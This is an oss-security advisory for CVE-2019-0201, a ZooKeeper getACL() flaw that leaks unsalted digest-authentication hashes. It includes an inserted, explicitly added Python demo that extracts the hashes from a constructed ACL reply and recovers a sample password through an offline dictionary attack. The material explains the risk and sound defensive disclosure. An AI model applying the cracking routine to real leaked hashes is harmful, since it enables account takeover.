
List:       oss-security
Subject:    [oss-security] [CVE-2019-0201] Information disclosure vulnerability in Apache ZooKeeper
From:       Andor Molnar <andor () apache ! org>
Date:       2019-05-20 17:15:24
Message-ID: 52C7AFA8-8CAB-4613-95E9-3EED492B9693 () apache ! org

CVE-2019-0201: Information disclosure vulnerability in Apache ZooKeeper

Severity: Critical

Vendor: The Apache Software Foundation

Versions Affected: ZooKeeper prior to 3.4.14, ZooKeeper 3.5.0-alpha through 3.5.4-beta. The unsupported ZooKeeper 1.x through 3.3.x versions may also be affected.

Description: ZooKeeper's getACL() command does not check any permission when it retrieves the ACLs of the requested node, and it returns all information contained in the ACL Id field as a plaintext string. DigestAuthenticationProvider overloads the Id field with the hash value that is used for user authentication. As a consequence, if Digest Authentication is in use, the unsalted hash value is disclosed by a getACL() request to unauthenticated or unprivileged users.
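The following is an added example, not part of this advisory and not ZooKeeper project code. It reproduces the "digest" scheme id format that ZooKeeper stores in the ACL Id field (user:base64(SHA1("user:password")), with no salt), scans a constructed getACL() reply for such ids, and shows why an unsalted disclosure matters: anyone holding the id can verify password guesses offline without further contact with the ensemble. The ACL entries are represented as plain dicts (a simplification of ZooKeeper's ACL/Id objects); the sample ACL, user name, password and word list are constructed for illustration.

```python
import base64
import hashlib


def generate_digest(user: str, password: str) -> str:
    """Build the id string ZooKeeper's "digest" scheme stores in an ACL.

    Format: user:base64(SHA1("user:password")). There is no salt, so the
    same user/password pair always yields the same id.
    """
    raw = f"{user}:{password}".encode("utf-8")
    digest = base64.b64encode(hashlib.sha1(raw).digest()).decode("ascii")
    return f"{user}:{digest}"


# Constructed sample: the scheme/id pairs a pre-fix getACL() would hand to any
# caller, privileged or not, for a znode protected with a digest ACL.
SAMPLE_ACL = [
    {"perms": 31, "scheme": "digest", "id": generate_digest("admin", "hunter2")},
    {"perms": 1, "scheme": "world", "id": "anyone"},
]


def find_leaked_digests(acl):
    """Return (user, hash) pairs for every digest-scheme entry in an ACL reply.

    This is what a reader of the getACL() output learns about each user.
    """
    leaked = []
    for entry in acl:
        if entry["scheme"] != "digest":
            continue
        user, _, digest = entry["id"].partition(":")
        leaked.append((user, digest))
    return leaked


def matches_password(leaked_id: str, candidate: str) -> bool:
    """Check a password guess against a leaked digest id, entirely offline."""
    user, _, _ = leaked_id.partition(":")
    return generate_digest(user, candidate) == leaked_id


def offline_guess(leaked_id: str, candidates):
    """Return the first candidate password that reproduces the leaked id, else None."""
    for candidate in candidates:
        if matches_password(leaked_id, candidate):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed word list; a real attacker would use a large dictionary.
    wordlist = ["password", "zookeeper", "hunter2"]
    for user, digest in find_leaked_digests(SAMPLE_ACL):
        recovered = offline_guess(f"{user}:{digest}", wordlist)
        print(f"user={user} hash={digest} recovered_password={recovered}")
```

The point the example makes: the getACL() reply is the only thing the guesser needs, and each guess costs one SHA-1 of a short string, so a disclosed digest id is effectively a disclosed password for any user whose password appears in a word list. Changing the password after upgrading only helps if the new password is not guessable; switching to an authentication scheme that does not store a password hash in the ACL Id field (such as Kerberos, as the Mitigation section advises) removes the exposure entirely.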

Mitigation: Use an authentication method other than Digest (e.g. Kerberos) or upgrade to 3.4.14 or later (3.5.5 or later if on the 3.5 branch).

Credit: This issue was identified by Harrison Neal <harrison@patchadvisor.com>, PatchAdvisor, Inc.

References: https://issues.apache.org/jira/browse/ZOOKEEPER-1392

